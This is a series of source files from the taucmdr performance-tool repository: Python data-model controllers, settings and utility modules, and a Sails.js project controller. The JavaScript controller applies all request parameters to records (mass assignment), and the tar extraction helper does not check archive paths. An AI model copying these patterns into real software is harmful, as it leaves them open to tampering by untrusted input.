requires either keys or eids')\n with user_storage as 
storage:\n storage.update(cls.model_name, fields, keys=keys, eids=eids)\n for model in changing:\n for attr, foreign in cls.associations.iteritems():\n try:\n new_foreign_keys = set(fields[attr])\n except KeyError:\n continue\n try:\n old_foreign_keys = set(model[attr])\n except KeyError:\n old_foreign_keys = set()\n foreign_model, via = foreign\n added = new_foreign_keys - old_foreign_keys\n deled = old_foreign_keys - new_foreign_keys\n model._addTo(foreign_model, added, via)\n model._removeFrom(foreign_model.search(eids=list(deled)), via)\n model.onUpdate()\n \n @classmethod\n def delete(cls, keys=None, eids=None):\n \"\"\"\n Delete the records that match the given keys and update associations\n \"\"\"\n if eids is not None:\n changing = cls.search(eids=eids)\n elif keys is not None:\n changing = cls.search(keys)\n else:\n raise error.InternalError('Controller.delete() requires either keys or eids')\n with user_storage as storage:\n for model in changing:\n model.onDelete()\n for attr, foreign in cls.associations.iteritems():\n foreign_model, via = foreign\n affected = foreign_model.search(eids=model[attr]) \n LOGGER.debug(\"Deleting %s(eid=%s) affects '%s' in '%s'\" % \n (cls.model_name, model.eid, via, affected))\n model._removeFrom(affected, via)\n for foreign_model, via in cls.references:\n test = lambda x: (model.eid in x if isinstance(x, list) else model.eid == x)\n affected = foreign_model.match(via, test=test)\n LOGGER.debug(\"Deleting %s(eid=%s) affects '%s'\" % (cls.model_name, model.eid, affected))\n model._removeFrom(affected, via)\n return storage.remove(cls.model_name, keys=keys, eids=eids)\n\n def _addTo(self, foreign_cls, keys, attr):\n LOGGER.debug(\"Adding %s to '%s' in %s(eids=%s)\" % \n (self.eid, attr, foreign_cls.model_name, keys))\n with user_storage as storage:\n for key in keys:\n model = foreign_cls.one(eid=key)\n if not model:\n raise ModelError(foreign_cls, \"No record with ID '%s'\" % key)\n if 'model' in model.attributes[attr]:\n updated = self.eid\n elif 'collection' in model.attributes[attr]:\n updated = list(set(model[attr] + [self.eid]))\n storage.update(foreign_cls.model_name, {attr: updated}, eids=key)\n\n def _removeFrom(self, affected, attr):\n LOGGER.debug(\"Removing %s from '%s' in %r\" % (self.eid, attr, affected))\n with user_storage as storage:\n for model in affected:\n if 'model' in model.attributes[attr]:\n if 'required' in model.attributes[attr]:\n LOGGER.debug(\"Empty required attr '%s': deleting %s(eid=%s)\" % \n (attr, model.model_name, model.eid))\n model.delete(eids=model.eid)\n else:\n storage.update(model.model_name, {attr: None}, eids=model.eid)\n elif 'collection' in model.attributes[attr]:\n update = list(set(model[attr]) - set([self.eid]))\n if 'required' in model.attributes[attr] and len(update) == 0:\n LOGGER.debug(\"Empty required attr '%s': deleting %s(eid=%s)\" % \n (attr, model.model_name, model.eid))\n model.delete(eids=model.eid)\n else:\n storage.update(model.model_name, {attr: update}, eids=model.eid)\n\n\n\nclass ByName(object):\n \"\"\"\n Mixin for a model with a unique 'name' field\n \"\"\"\n @classmethod\n def withName(cls, name):\n return cls.one({'name': name})\n" }, { "alpha_fraction": 0.5659229159355164, "alphanum_fraction": 0.5679513216018677, "avg_line_length": 33.387596130371094, "blob_id": "e1e79d9f0e28dc1d80a0cf6f6093c7533a27f0c4", "content_id": "f9d23d87b424502d0fefb517c75d4c8d642a7857", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 
4437, "license_type": "permissive", "max_line_length": 95, "num_lines": 129, "path": "/packages/tau/model/application.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport string\n\n# TAU modules\nimport controller as ctl\nimport arguments as args\n\n\nclass Application(ctl.Controller, ctl.ByName):\n \"\"\"\n Application data model controller\n \"\"\"\n \n attributes = {\n 'projects': {\n 'collection': 'Project',\n 'via': 'applications'\n },\n 'name': {\n 'type': 'string',\n 'unique': True,\n 'argparse': {'help': 'Application configuration name',\n 'metavar': '<application_name>'}\n },\n 'openmp': {\n 'type': 'boolean',\n 'defaultsTo': False,\n 'argparse': {'flags': ('--openmp',),\n 'help': 'application uses OpenMP',\n 'metavar': 'yes/no',\n 'nargs': '?',\n 'const': True,\n 'action': args.ParseBooleanAction}\n },\n 'pthreads': {\n 'type': 'boolean',\n 'defaultsTo': False,\n 'argparse': {'flags': ('--pthreads',),\n 'help': 'application uses pthreads',\n 'metavar': 'yes/no',\n 'nargs': '?',\n 'const': True,\n 'action': args.ParseBooleanAction}\n },\n 'mpi': {\n 'type': 'boolean',\n 'defaultsTo': False,\n 'argparse': {'flags': ('--mpi',),\n 'help': 'application uses MPI',\n 'metavar': 'yes/no',\n 'nargs': '?',\n 'const': True,\n 'action': args.ParseBooleanAction}\n },\n 'cuda': {\n 'type': 'boolean',\n 'defaultsTo': False,\n 'argparse': {'flags': ('--cuda',),\n 'help': 'application uses NVIDIA CUDA',\n 'metavar': 'yes/no',\n 'nargs': '?',\n 'const': True,\n 'action': args.ParseBooleanAction}\n },\n 'shmem': {\n 'type': 'boolean',\n 'defaultsTo': False,\n 'argparse': {'flags': ('--shmem',),\n 'help': 'application uses SHMEM',\n 'metavar': 'yes/no',\n 'nargs': '?',\n 'const': True,\n 'action': args.ParseBooleanAction}\n },\n 'mpc': {\n 'type': 'boolean',\n 'defaultsTo': False,\n 
'argparse': {'flags': ('--mpc',),\n 'help': 'application uses MPC',\n 'metavar': 'yes/no',\n 'nargs': '?',\n 'const': True,\n 'action': args.ParseBooleanAction}\n }\n }\n \n _valid_name = set(string.digits + string.letters + '-_.')\n \n def onCreate(self):\n if not set(self['name']) <= Application._valid_name:\n raise ctl.ModelError(Application,\n '%r is not a valid application name. Use only letters, numbers, dot (.), dash (-), and underscore (_).' % self['name'])\n\n" }, { "alpha_fraction": 0.7111727595329285, "alphanum_fraction": 0.7147384881973267, "avg_line_length": 29.792682647705078, "blob_id": "ac888a08e9fa62b5182999bd4b8b3d77e997a09f", "content_id": "20e609b04e97d82ac6c8c968a67e7bd210758d7d", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2524, "license_type": "permissive", "max_line_length": 79, "num_lines": 82, "path": "/packages/tau/settings.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# TAU modules\nimport logger\nfrom model.setting import Setting\n\n\nLOGGER = logger.getLogger(__name__)\n\n_data = {}\n\n\ndef _load():\n for record in Setting.all():\n key = record['key']\n val = record['value'] \n _data[key] = val\n LOGGER.debug(\"Loaded settings: %r\" % _data)\n \ndef _save():\n LOGGER.debug(\"Saving settings: %r\" % _data)\n for key, val in _data.iteritems():\n if Setting.exists({'key': key}):\n Setting.update({'value': val}, {'key': key})\n else:\n Setting.create({'key': key, 'value': val})\n\ndef get(key):\n \"\"\"\n Get the value of setting 'key' or None if not set\n \"\"\"\n if not _data: \n _load()\n return _data.get(key, None)\n\ndef set(key, val):\n \"\"\"\n Set setting 'key' to value 'val'\n \"\"\"\n _data[key] = val\n _save()\n \ndef unset(key):\n \"\"\"\n Remove setting 'key' from the list of settings\n \"\"\"\n _data.pop(key, None)\n Setting.delete({'key': key})" }, { "alpha_fraction": 0.5067128539085388, "alphanum_fraction": 0.5067128539085388, "avg_line_length": 21.211538314819336, "blob_id": "73ebd1f8c3c66c8fbfa76de03dd4d23251880a54", "content_id": "a87267b3556dd4eeb8d0dffec08b6094f85c6529", "detected_licenses": [ "BSD-2-Clause", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2309, "license_type": "permissive", "max_line_length": 77, "num_lines": 104, "path": "/commander/api/controllers/ProjectController.js", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "/**\n * ProjectController\n *\n * @description :: Server-side logic for managing projects\n * @help :: See http://links.sailsjs.org/docs/controllers\n */\n\n module.exports = {\n\n view: function(req, res, next) {\n Project.find({}).exec(function (err, projects) {\n if (err) {\n sails.log.error(err);\n return next(err);\n }\n if (!projects) {\n sails.log.debug('No projects found.');\n return next();\n }\n res.view({\n projects: projects\n });\n });\n },\n\n new: function(req, res, next) {\n res.view();\n },\n\n show: function(req, res, next) {\n var id = req.param('id');\n if (!id) return next();\n Project.findOne(id).exec(function (err, project) {\n if (err) {\n sails.log.error(err);\n return next(err);\n }\n if (!project) {\n sails.log.debug('Project ID '+id+' not found.');\n return next();\n }\n res.view({\n project: project\n });\n });\n },\n\n edit: function(req, res, next) {\n var id = req.param('id');\n if (!id) return next();\n Project.findOne(id).exec(function (err, project) {\n if (err) {\n sails.log.error(err);\n return next(err);\n }\n if (!project) {\n sails.log.debug('Project ID '+id+' not found.');\n return next();\n }\n res.view({\n project: project\n });\n });\n },\n\n create: function(req, res, next) {\n Project.create(req.params.all()).exec(function (err, project) {\n if (err) {\n sails.log.error(err);\n return next(err);\n }\n res.redirect('/project');\n });\n },\n\n update: function(req, res, next) {\n var id = req.param('id');\n if (!id) return next();\n 
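// mass-assignment: req.params.all() applies every request parameter to the matched record\n 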
Project.update({id: id}, req.params.all()).exec(function (err, project) {\n if (err) {\n sails.log.error(err);\n return next(err);\n }\n if (!project) {\n sails.log.debug('Project ID '+id+' not found.');\n return next();\n }\n res.redirect('/project/show/'+id);\n });\n },\n\n destroy: function(req, res, next) {\n var id = req.param('id');\n if (!id) return next();\n Project.destroy({id: id}).exec(function (err) {\n if (err) {\n sails.log.error(err);\n return next(err);\n }\n res.redirect('/project');\n });\n }\n\n};" }, { "alpha_fraction": 0.7621030807495117, "alphanum_fraction": 0.7714731693267822, "avg_line_length": 34.592594146728516, "blob_id": "5dca4d8b12e0c82c2713739868a0d8c367194eda", "content_id": "acc2d36c614a5bae480ff3c0f10b32ea92ca983d", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1921, "license_type": "permissive", "max_line_length": 79, "num_lines": 54, "path": "/packages/tau/__init__.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief \n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport os\nimport sys\n\n\n# Exit codes\nEXIT_FAILURE = -100\nEXIT_WARNING = 100\nEXIT_SUCCESS = 0\n\n# Contact for bugs, etc.\nHELP_CONTACT = '<[email protected]>'\n\nPROJECT_URL = 'http://www.taucommander.com/'\n\n#Expected Python version\nMINIMUM_PYTHON_VERSION = (2, 7)" }, { "alpha_fraction": 0.5308310985565186, "alphanum_fraction": 0.532674252986908, "avg_line_length": 34.099998474121094, "blob_id": "8510912ac458a0012729fd6f81d935fb8b1232cf", "content_id": "19d675d46ee1b6101e696dd3dc29cc2f43155263", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5968, "license_type": "permissive", "max_line_length": 95, "num_lines": 170, "path": "/packages/tau/model/measurement.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport string\n\n# TAU modules\nimport controller as ctl\nimport arguments as args\n\n\nclass Measurement(ctl.Controller, ctl.ByName):\n \"\"\"\n Measurement data model controller\n \"\"\"\n \n attributes = {\n 'projects': {\n 'collection': 'Project',\n 'via': 'measurements'\n },\n 'name': {\n 'type': 'string',\n 'unique': True,\n 'argparse': {'help': 'measurement configuration name',\n 'metavar': '<measurement_name>'}\n\n },\n 'profile': {\n 'type': 'boolean',\n 'defaultsTo': True,\n 'argparse': {'flags': ('--profile',),\n 'help': 'gather application profiles',\n 'metavar': 'T/F',\n 'nargs': '?',\n 'const': True,\n 'action': args.ParseBooleanAction}\n },\n 'trace': {\n 'type': 'boolean',\n 'defaultsTo': False,\n 'argparse': {'flags': ('--trace',),\n 'help': 'gather application traces',\n 'metavar': 'T/F',\n 'nargs': '?',\n 'const': True,\n 'action': args.ParseBooleanAction}\n },\n 'sample': {\n 'type': 'boolean',\n 'defaultsTo': False,\n 'argparse': {'flags': ('--sample',),\n 'help': 'gather application program counter samples',\n 'metavar': 'T/F',\n 'nargs': '?',\n 'const': True,\n 'action': args.ParseBooleanAction}\n },\n 'source_inst': {\n 'type': 'boolean',\n 'defaultsTo': True,\n 'argparse': {'flags': ('--source-inst',),\n 'help': 'use source code parsing to instrument the application',\n 'metavar': 'T/F',\n 'nargs': '?',\n 'const': True,\n 'action': args.ParseBooleanAction}\n },\n 'compiler_inst': {\n 'type': 'string',\n 'defaultsTo': 'fallback',\n 'argparse': {'flags': ('--compiler-inst',),\n 'help': 'use compiler callbacks to instrument the application',\n 'metavar': 'mode',\n 'nargs': '?',\n 'const': 'always',\n 'choices': ['always', 'fallback', 'never']}\n },\n 'mpi': {\n 'type': 'boolean',\n 'defaultsTo': False,\n 'argparse': {'flags': ('--mpi',),\n 'help': 'measure time spent in MPI methods',\n 'metavar': 'T/F',\n 'nargs': '?',\n 'const': True,\n 'action': args.ParseBooleanAction}\n },\n 'openmp': {\n 'type': 'string',\n 'defaultsTo': 'ignore',\n 'argparse': {'flags': ('--openmp',),\n 'help': 'method used to measure time spent in OpenMP directives',\n 'metavar': 'method',\n 'nargs': '?',\n 'const': 'opari',\n 'choices': ['ignore', 'opari', 'ompt']}\n },\n 'callpath': {\n 'type': 'integer',\n 'defaultsTo': 2,\n 'argparse': {'flags': ('--callpath',),\n 'help': 'maximum depth of callpath recording',\n 'metavar': 'depth',\n 'nargs': '?',\n 'const': 2,\n 'type': int}\n },\n 'memory_usage': {\n 'type': 'boolean',\n 'defaultsTo': False,\n 'argparse': {'flags': ('--memory-usage',),\n 'help': 'measure memory consumption',\n 'metavar': 'T/F',\n 'nargs': '?',\n 'const': True,\n 'action': args.ParseBooleanAction}\n },\n 'memory_alloc': {\n 'type': 'boolean',\n 'defaultsTo': False,\n 'argparse': {'flags': ('--memory-alloc',),\n 'help': 'record memory allocation and deallocation events',\n 'metavar': 'T/F',\n 'nargs': '?',\n 'const': True,\n 'action': args.ParseBooleanAction}\n },\n }\n \n _valid_name = set(string.digits + string.letters + 
'-_.')\n \n def onCreate(self):\n if set(self['name']) > Measurement._valid_name:\n raise ctl.ModelError('%r is not a valid measurement name.' % self['name'],\n 'Use only letters, numbers, dot (.), dash (-), and underscore (_).')\n\n" }, { "alpha_fraction": 0.6304042935371399, "alphanum_fraction": 0.6369085311889648, "avg_line_length": 30.489959716796875, "blob_id": "860e5d8844dd76b3c2ea45f0f6ab6b5177f536b2", "content_id": "a6d7aa9fc1eec357276993267f063465c637edda", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7841, "license_type": "permissive", "max_line_length": 116, "num_lines": 249, "path": "/packages/tau/util.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport os\nimport sys\nimport re\nimport subprocess\nimport errno\nimport shutil\nimport urllib\nimport tarfile\nimport pprint\nimport tempfile\nfrom StringIO import StringIO\n\n# TAU modules\nimport logger\nimport environment\nfrom tau.logger import LINE_WIDTH\n\n\nLOGGER = logger.getLogger(__name__)\n\n\ndef mkdirp(*args):\n \"\"\"\n Creates a directory and all its parents.\n \"\"\"\n for path in args:\n try:\n os.makedirs(path)\n LOGGER.debug('Created directory %r' % path)\n except OSError as exc:\n if exc.errno == errno.EEXIST and os.path.isdir(path): pass\n else: raise\n\n\ndef which(program):\n \"\"\"\n Returns the full path to 'program'\n Searches the system PATH and the current directory\n \"\"\"\n def is_exec(fpath):\n return os.path.isfile(fpath) and os.access(fpath, os.X_OK)\n fpath, _ = os.path.split(program)\n if fpath:\n abs_program = os.path.abspath(program)\n if is_exec(abs_program):\n LOGGER.debug(\"which(%s) = '%s'\" % (program, abs_program))\n return abs_program\n else:\n # System path\n for path in environment.getEnv('PATH').split(os.pathsep):\n path = path.strip('\"')\n exe_file = os.path.join(path, program)\n if is_exec(exe_file):\n LOGGER.debug(\"which(%s) = '%s'\" % (program, exe_file))\n return exe_file\n LOGGER.debug(\"which(%s): command not found\" % program)\n return None\n\n\ndef download(src, dest):\n \"\"\"\n Downloads or copies 'src' to 'dest'\n \"\"\"\n if src.startswith('file://'):\n src = src[6:]\n if os.path.isfile(src):\n LOGGER.debug(\"Copying '%s' to '%s'\" % (src, dest))\n mkdirp(os.path.dirname(dest))\n shutil.copy(src, dest)\n return 0\n else:\n LOGGER.debug(\"Downloading '%s' to '%s'\" % (src, dest))\n LOGGER.info(\"Downloading '%s'\" % src)\n mkdirp(os.path.dirname(dest))\n curl = which('curl')\n LOGGER.debug(\"which curl: '%s'\" % curl)\n wget = which('wget')\n LOGGER.debug(\"which wget: '%s'\" % wget)\n curl_cmd = [curl, '-L', src, '-o', dest] if curl else None\n wget_cmd = [wget, src, '-O', dest] if wget else None\n for cmd in [curl_cmd, wget_cmd]:\n if cmd:\n ret = createSubprocess(cmd, stdout=False)\n if ret != 0:\n LOGGER.warning(\"%s failed to download '%s'. 
Retrying with a different method...\" % (cmd[0], src))\n            else:\n                return ret\n    # Fallback: this is usually **much** slower than curl or wget\n    def _dlProgress(count, blockSize, totalSize):\n        sys.stdout.write(\"% 3.1f%% of %d bytes\\r\" % (min(100, float(count * blockSize) / totalSize * 100), totalSize))\n    try:\n        urllib.urlretrieve(src, dest, reporthook=_dlProgress)\n    except Exception as err:\n        LOGGER.warning(\"urllib failed to download '%s': %s\" % (src, err))\n        raise IOError(\"Failed to download '%s'\" % src)\n\n    \ndef extract(archive, dest):\n    \"\"\"\n    Extracts archive file 'archive' to dest\n    \"\"\"\n    with tarfile.open(archive) as fp:\n        LOGGER.debug(\"Determining top-level directory name in '%s'\" % archive)\n        dirs = [d.name for d in fp.getmembers() if d.type == tarfile.DIRTYPE]\n        topdir = min(dirs, key=len)\n        LOGGER.debug(\"Top-level directory in '%s' is '%s'\" % (archive, topdir))\n        full_dest = os.path.join(dest, topdir)\n        LOGGER.debug(\"Extracting '%s' to create '%s'\" % (archive, full_dest))\n        LOGGER.info(\"Extracting '%s'\" % archive)\n        mkdirp(dest)\n        fp.extractall(dest)\n        assert os.path.isdir(full_dest)\n        LOGGER.debug(\"Created '%s'\" % full_dest)\n        return full_dest\n\n\ndef file_accessible(filepath, mode='r'):\n    \"\"\"\n    Check if a file exists and is accessible.\n    \"\"\"\n    try:\n        with open(filepath, mode) as _:\n            return True\n    except IOError:\n        return False\n\n    \ndef pformatDict(d, title=None, empty_msg='No items.', indent=0, truncate=False):\n    \"\"\"\n    Pretty formatter for dictionaries\n    \"\"\"\n    if title:\n        line = '{:=<75}\\n'.format('== %s ==' % title)\n    else:\n        line = '' \n    if d and len(d):\n        longest = max(map(len, d.keys()))\n        line_width = logger.LINE_WIDTH - longest - 15\n        space = ' '*indent\n        def pf(x):\n            if truncate and (len(x) > line_width):\n                return x[0:line_width] + ' [...]'\n            else:\n                return str(x)\n        items = '\\n'.join(['{}{:<{width}} : {}'.format(space, key, pf(val), width=longest)\n                           for key, val in sorted(d.iteritems())])\n    else:\n        items = empty_msg\n    return '%(line)s%(items)s' % {'line': line, 'items': items}\n    \n\ndef pformatList(d, title=None, empty_msg='No items.', indent=0):\n    \"\"\"\n    Pretty formatter for lists\n    \"\"\"\n    if title:\n        line = '{:=<75}\\n'.format('== %s ==' % title)\n    else:\n        line = ''\n    if d and len(d):\n        space = ' '*indent\n        items = '\\n'.join(['%s%s' % (space, val) for val in sorted(d)])\n    else:\n        items = empty_msg\n    return '%(line)s%(items)s' % {'line': line, 'items': items}\n\n\ndef createSubprocess(cmd, cwd=None, env=None, fork=False, stdout=True, log=True):\n    \"\"\"\n    \"\"\"\n    if not cwd:\n        cwd = os.getcwd()\n    LOGGER.debug(\"Creating subprocess: cmd=%s, cwd='%s'\\n\" % (cmd, cwd))\n    # Show what's different in the environment\n    if env:\n        changed = {}\n        for key, val in env.iteritems():\n            LOGGER.debug(\"%s=%s\" % (key, ''.join([c for c in val if ord(c) < 128 and ord(c) > 31])))\n            try:\n                orig = os.environ[key]\n            except KeyError:\n                changed[key] = val\n            else:\n                if val != orig:\n                    changed[key] = val\n        LOGGER.info(pformatDict(changed, truncate=True))\n    # Show what will be executed\n    LOGGER.info(' '.join(cmd))\n    pid = os.fork() if fork else 0\n    if pid == 0:\n        proc = subprocess.Popen(cmd, cwd=cwd, env=env,\n                                stdout=subprocess.PIPE, \n                                stderr=subprocess.STDOUT)\n        stdout, stderr = proc.communicate()\n        if log:\n            LOGGER.debug(stdout)\n        if stdout and (logger.LOG_LEVEL != 'DEBUG'):\n            sys.stdout.write(stdout)\n        retval = proc.returncode\n        LOGGER.debug(\"%s returned %d\" % (cmd, retval))\n        return retval\n    else:\n        return 0\n    \ndef humanReadableSize(num, suffix='B'):\n    \"\"\"\n    Returns 
